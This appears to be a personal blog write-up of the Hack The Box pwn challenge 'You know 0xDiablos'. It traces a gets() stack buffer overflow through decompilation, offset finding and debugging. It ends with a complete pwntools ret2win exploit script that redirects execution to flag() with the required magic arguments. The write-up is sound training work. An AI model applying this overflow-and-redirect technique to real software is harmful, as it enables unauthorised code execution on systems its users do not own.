__                                   
                                 ____ _____    _____/  |_                                 
                               _/ ___\\__  \  /    \   __\                                
                               \  \___ / __ \|   |  \  |                                  
                                \___  >____  /___|  /__|                                  
                                    \/     \/     \/                                      
                                                                                          
                                  ________  _  ______                                     
                                  \____ \ \/ \/ /    \                                    
                                  |  |_> >     /   |  \                                   
                                  |   __/ \/\_/|___|  /                                   
                                  |__|              \/                                    
                                                                                          
                                                                                          
                                                                                          
─────────────────────────────────── cause I can't pwn ────────────────────────────────────
                                                                                          
 < back home                                                                              
                                                                                          
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃                                   you know 0xdiablos                                   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛

The challenge is one of the first pwn challenges in HTB and can be found here.            


                                Finding the Vulnerability                                 

First thing I do after downloading the challenge (unzip with the password hackthebox!), I 
try running it. After that, I use IDA to decompile it:                                    

                                                                                          
 int __cdecl main(int argc, const char **argv, const char **envp)                         
 {                                                                                        
   __gid_t v4; // [esp+0h] [ebp-Ch]                                                       
                                                                                          
   setvbuf(stdout, 0, 2, 0);                                                              
   v4 = getegid();                                                                        
   setresgid(v4, v4, v4);                                                                 
   puts("You know who are 0xDiablos: ");                                                  
   vuln();                                                                                
   return 0;                                                                              
 }                                                                                        
                                                                                          

Cool, nothing necessarily interesing here, except that we have a hint called vuln().      
Decompiling that function:                                                                

                                                                                          
 int vuln()                                                                               
 {                                                                                        
   char s[180]; // [esp+0h] [ebp-B8h] BYREF                                               
                                                                                          
   gets(s);                                                                               
   return puts(s);                                                                        
 }                                                                                        
                                                                                          

The gets() function has no limit on the number of characters it will read (man gets in the
terminal):                                                                                

                                                                                          
 NAME                                                                                     
        gets - get a string from standard input (DEPRECATED)                              
                                                                                          
 LIBRARY                                                                                  
        Standard C library (libc, -lc)                                                    
                                                                                          
 SYNOPSIS                                                                                 
        #include <stdio.h>                                                                
                                                                                          
        [[deprecated]] char *gets(char *s);                                               
                                                                                          
 DESCRIPTION                                                                              
        Never use this function.                                                          
                                                                                          
        gets() reads a line from stdin into the buffer pointed to by s until either a     
 terminating newline or EOF, which it replaces with a null byte ('\0').  No check for     
 buffer overrun is performed (see BUGS below).                                            
                                                                                          
 RETURN VALUE                                                                             
        gets() returns s on success, and NULL on error or when end of file occurs while   
 no characters have been read.  However, given the lack of buffer overrun checking, there 
 can be no guarantees that the function will even return.                                 
                                                                                          

Fair enough, never use this function, and with good reason! If we write more than 180     
bytes (read: characters in ASCII encoding), we will overflow the buffer. We can show that 
we can break this, by just passing much more than 180 characters.                         

First, this is the 'normal' behavior we expect:                                           

                                                                                          
 vscode ➜ /workspaces/htb/you_know_0xdiablos $ ./vuln                                     
 You know who are 0xDiablos:                                                              
 test                                                                                     
 test                                                                                     
                                                                                          

It just echoes. Using pwntools to give an input much larger than 180 characters (again,   
bytes, but it's the same using ASCII encoding),                                           

                                                                                          
 from pwn import *                                                                        
                                                                                          
                                                                                          
 def start(exe):                                                                          
     return process(exe)                                                                  
                                                                                          
                                                                                          
 exe = './vuln'                                                                           
 io = start(exe)                                                                          
                                                                                          
 io.sendafter(b'You know who are 0xDiablos:', b'A' * 1000 + b'\n')                        
 io.recvall(timeout=1)                                                                    
                                                                                          

which when run:                                                                           

                                                                                          
 vscode ➜ /workspaces/htb/you_know_0xdiablos $ python show_vuln.py                        
 [+] Starting local process './vuln': pid 5542                                            
 [+] Receiving all data: Done (1003B)                                                     
 [*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 5542)                     
                                                                                          

Awesome, we get a SEGMENTATION_FAULT, meaning that we have a buffer overflow              
vulnerability. Now, on to exploiting it.                                                  


                                       Exploitation                                       

First, let's consider the target: how do we get the flag? This will give more direction to
finding the most suitable method of exploitation. Doing some exploration in IDA, shows the
following functions:                                                                      

main: Our main function.                                                               
vuln: The function we just found the vulnerability in.                                 
flag: Oh well would you look at that.                                                  

Decompiling the flag function, gives the following:                                       

                                                                                          
 char *__cdecl flag(int a1, int a2)                                                       
 {                                                                                        
   char *result; // eax                                                                   
   char s[64]; // [esp+Ch] [ebp-4Ch] BYREF                                                
   FILE *stream; // [esp+4Ch] [ebp-Ch]                                                    
                                                                                          
   stream = fopen("flag.txt", "r");                                                       
   if ( !stream )                                                                         
   {                                                                                      
     puts("Hurry up and try in on server side.");                                         
     exit(0);                                                                             
   }                                                                                      
   result = fgets(s, 64, stream);                                                         
   if ( a1 == -559038737 && a2 == -1059139571 )                                           
     return (char *)printf(s);                                                            
   return result;                                                                         
 }                                                                                        
                                                                                          

This tries to read a flag.txt, opens the stream, checks if the two arguments equal some   
values, then prints the contets of that flag.txt file.                                    

▌ When I did this challenge, I immeditely saw the flag function, tried to run a buffer  
▌ overflow to return to that function, and was met with the string "Hurry up and try it 
on server side.". Of course, this didn't work because I had failed to read over the   
▌ whole function and see the argument checks at the end. I rushed and didn't include the
required arguments.                                                                   

Cool, the first thought is to overwrite the return address of vuln using our buffer       
overflow to go to this function, but we also have to construct the stack in such a way    
that the two passed arguments equal those values. These seem strange, but looking at the  
assembly:                                                                                 

🌆 alt text                                                                               

We can see that the two cmp (compare) instructions in the bottom right two boxes (the ones
that don't follow the "Hurry up and try [...]" code path), check whether [ebp+arg_0]      
equals 0x0DEADBEEF (the h at the end just indicates it's a hex value), and [ebp+arg_4]    
equals 0x0C0DED00D. (The flag assembly shows the values of arg_0 and arg_4).              

This means that we need to put the first value at the address with an offset of 0x8 bytes 
from the stack base pointer (ebp), and the second at 0xCh (or 12 in decimal) bytes from   
the ebp.                                                                                  

We can simply do this by calculating the offset needed to overwrite the values of the     
registers eip (instruction pointer which should point to flag) and ebp (stack base        
pointer, as mentioned before). We can analyze the core dump generated:                    

                                                                                          
 from pwn import *                                                                        
 import os                                                                                
                                                                                          
 os.system('clear')                                                                       
                                                                                          
                                                                                          
 def start(exe, argv=[], *a, **kw):                                                       
     return process([exe] + argv, *a, **kw)                                               
                                                                                          
                                                                                          
 def get_offset(binpath, payload_len=2000, argv=[]):                                      
     with process([binpath] + argv) as io:                                                
         io.sendline(cyclic(payload_len))  # type: ignore                                 
         io.wait()                         # wait for the crash to produce a core         
                                                                                          
     core = io.corefile                                                                   
                                                                                          
     def get_offset_reg(reg):                                                             
         try_pat = p32(getattr(core, reg))                                                
         if cyclic_find(try_pat) == -1:                                                   
             return None                                                                  
                                                                                          
         return cyclic_find(try_pat)                                                      
                                                                                          
     ip_off = get_offset_reg('eip')                                                       
     bp_off = get_offset_reg('ebp')                                                       
                                                                                          
     return ip_off, bp_off                                                                
                                                                                          
                                                                                          
 exe = './vuln'                                                                           
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
 ip_off, bp_off = get_offset(exe)                                                         
                                                                                          
 if ip_off and bp_off:                                                                    
     success(f"Offsets (eip, ebp) --> {ip_off}, {bp_off}")                                
 else:                                                                                    
     error("Something went wrong... Please check the corefile")                           
                                                                                          

Running this, we get the following:                                                       

                                                                                          
 [*] '/workspaces/htb/you_know_0xdiablos/vuln'                                            
     Arch:       i386-32-little                                                           
     RELRO:      Partial RELRO                                                            
     Stack:      No canary found                                                          
     NX:         NX unknown - GNU_STACK missing                                           
     PIE:        No PIE (0x8048000)                                                       
     Stack:      Executable                                                               
     RWX:        Has RWX segments                                                         
     Stripped:   No                                                                       
 [+] Starting local process './vuln': pid 18512                                           
 [*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 18512)                    
 [+] Parsing corefile...: Done                                                            
 [!] Error parsing corefile stack: Found bad environment at 0xff862fd1                    
 [*] '/workspaces/htb/you_know_0xdiablos/core.18512'                                      
     Arch:      i386-32-little                                                            
     EIP:       0x62616177                                                                
     ESP:       0xff860f90                                                                
     Exe:       '/workspaces/htb/you_know_0xdiablos/vuln' (0x8048000)                     
     Fault:     0x62616177                                                                
 [+] Offsets (eip, ebp) --> 188, 184                                                      
                                                                                          

Great! Not only do we have the values, but we can see that there are no stack canaries or 
PIE, ensuring that overwriting the stack won't be a problem, and that we the offsets don't
change from executiong to execution.                                                      

▌ Note that this makes sense given the layout of the stack (and we didn't necessarily   
▌ need to calculate ebp). Clasically, the layout is as follows:                         
                                                                                      
 -0x08: old_eip                                                                       
 -0x04: old_ebp                                                                       
  <--- ebp                                                                            
 +0x00: s[180]                                                                        
  [...]                                                                               
 +0xB0: s[1]                                                                          
 +0xB4: s[0]                                                                          
  <--- esp                                                                            
                                                                                      
▌ In our case, the local_variable is buffer, which we 'write' from bottom to top in the 
▌ diagram. Since 32-bit binaries are 4-byte wide (word), we find that we first overwrite
▌ the old_ebp 4 bytes earlier than the old_eip.                                         

Overwriting the EIP is easy (shown later), but since we need to point the ebp some known  
memory address we can overwrite, I've prompted to just find out the stack location of the 
buffer we're trying to overflow (i.e. the address of s[]):                                

                                                                                          
 from pwn import *                                                                        
                                                                                          
                                                                                          
 def start(exe, gdbscript='', argv=[], *a, **kw):                                         
     context.terminal = ['tmux', 'splitw', '-h']                                          
     return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)                        
                                                                                          
                                                                                          
 gdbscript = """                                                                          
 b vuln                                                                                   
 continue                                                                                 
 """                                                                                      
                                                                                          
 exe = './vuln'                                                                           
                                                                                          
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
                                                                                          
 io = start(exe, gdbscript=gdbscript)                                                     
 io.recvall()                                                                             
                                                                                          

Notice the gdbscript which breaks at vuln. Entering reg ebp in the pwngdb prompt gives us:

                                                                                          
 0xf7f6b560 in _start () from target:/lib/ld-linux.so.2                                   
 Breakpoint 1 at 0x8049276                                                                
 Reading /lib/i386-linux-gnu/libc.so.6 from remote target...                              
                                                                                          
 Breakpoint 1, 0x08049276 in vuln ()                                                      
 *EBP  0xffd99c38 —▸ 0xffd99c58 ◂— 0                                                      
                                                                                          

Which I just wanna verify by starting the buffer with A and following it with a long      
number of B's. Running the same code as before, just inserting a payload, we get:         

                                                                                          
 ──────────────────────────[ STACK ]────────────────────────────────────────              
 00:0000│ esp 0xffcb2dc0 —▸ 0xffcb2dd0 ◂— 0x42424241 ('ABBB')                             
 01:0004│-0c4 0xffcb2dc4 —▸ 0xf7fa0de7 (_IO_2_1_stdout_+71) ◂— 0xfa19b80a                 
 02:0008│-0c0 0xffcb2dc8 ◂— 1                                                             
 03:000c│-0bc 0xffcb2dcc —▸ 0x8049281 (vuln+15) ◂— add ebx, 0x2d7f                        
 04:0010│ eax 0xffcb2dd0 ◂— 0x42424241 ('ABBB')                                           
 05:0014│-0b4 0xffcb2dd4 ◂— 0x42424242 ('BBBB')                                           
 ... ↓        2 skipped                                                                   
 ───────────────────────────────────────────────────────────────────────────              
                                                                                          

Which shoes that our ABBB is at 0xffcb2dd0 (which is actually eax, as the buffer was      
passed to the gets function as the first argument, the convention for syscalls). This this
means our payload becomes:                                                                

                                                                                          
 buffer_start_address = 0xffcb2dd0                                                        
 eip_offset = 188                                                                         
 ebp_offset = 184                                                                         
                                                                                          
 flag_stack = pack(0xDEADBEEF) + pack(0xC0DED00D)                                         
 padding = (ebp_offset - len(flag_stack)) * b'0x92'                                       
 overflow = pack(buffer_start_address) + pack(elf.symbols['flag'])                        
                                                                                          

However, this is not quite right. What I was trying to do (overwrite the saved ebp with an
address somewhere inside the buffer so that flag() would see the magic values at [ebp+8] /
[ebp+12]) fails for a simple reason: flag() runs its own prologue and immediately         
overwrites ebp with the current esp                                                       

The issue was that I didn't quite understand how the stack works when calling a function, 
which is effectively what we're trying to emulate here. Calling a function, the following 
would happen in assembly:                                                                 

                                                                                          
 push arg_1                                                                               
 push arg_0                                                                               
 call flag   # push eip on the stack, replace eip with <flag>                             
                                                                                          

The stack would then look like:                                                           

                                                                                          
 [arg_1]                                                                                  
 [arg_0]                                                                                  
 [old_eip]                                                                                
                                                                                          

The stack layout at the end of a function (before the epilogue) is as follows:            

                                                                                          
 [old_ebp]                                                                                
 [old_eip]                                                                                
                                                                                          

Since we're faking calling a function, we can emulate this as follows:                    

                                                                                          
 payload = flat(                                                                          
     eip_offset * b'A',      # padding                                                    
     elf.symbols['flag'],    # flag function address (old eip)                            
     elf.symbols['main'],    # any valid pointer (old ebp)                                
     0xDEADBEEF,             # argument 1                                                 
     0xC0DED00D              # argument 2                                                 
 )                                                                                        
                                                                                          

This is the reverse, since we're writing the buffer opposite the way that the buffer      
grows, leaving us with the final script:                                                  

                                                                                          
 from pwn import *                                                                        
 import os                                                                                
                                                                                          
 os.system('clear')                                                                       
                                                                                          
                                                                                          
 def start(exe, argv=[], *a, **kw):                                                       
     if args.REMOTE:                                                                      
         host, ip = sys.argv[1].split(':')                                                
         return remote(host, ip, *a, **kw)                                                
     elif args.GDB:                                                                       
         context.terminal = ['tmux', 'splitw', '-h']                                      
         return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)                    
     else:                                                                                
         return process([exe] + argv, *a, **kw)                                           
                                                                                          
                                                                                          
 gdbscript = """                                                                          
 b vuln                                                                                   
 b flag                                                                                   
 continue                                                                                 
 """                                                                                      
                                                                                          
 exe = './vuln'                                                                           
 elf = context.binary = ELF(exe, checksec=True)                                           
 context.log_level = 'INFO'                                                               
                                                                                          
 flag = re.compile(r"HTB{.+?}")                                                           
 buffer_start_address = 0xffcb2dd0  # from get_stack.py                                   
 eip_offset = 188                                                                         
 ebp_offset = 184                                                                         
                                                                                          
 io = start(exe)                                                                          
                                                                                          
 payload = flat(                                                                          
     eip_offset * b'A',      # padding                                                    
     elf.symbols['flag'],    # flag function address (old eip)                            
     elf.symbols['main'],    # any valid pointer (old ebp)                                
     0xDEADBEEF,             # argument 1                                                 
     0xC0DED00D              # argument 2                                                 
 )                                                                                        
                                                                                          
 info(f"Sending payload to flag address: {payload.hex()}")                                
 io.sendlineafter(b'0xDiablos:', payload)                                                 
                                                                                          
 if args.GDB:                                                                             
     response = io.recvall().decode(errors="ignore", encoding="ascii")                    
 else:                                                                                    
     response = io.recvall(timeout=.5).decode(errors="ignore", encoding="ascii")          
                                                                                          
 match = flag.search(response)                                                            
                                                                                          
 if match:                                                                                
     success(f"FLAG --> {match.group(0)}")                                                
 else:                                                                                    
     warning(f"FLAG NOT FOUND")                                                           
     info(f"Response:\n{response}")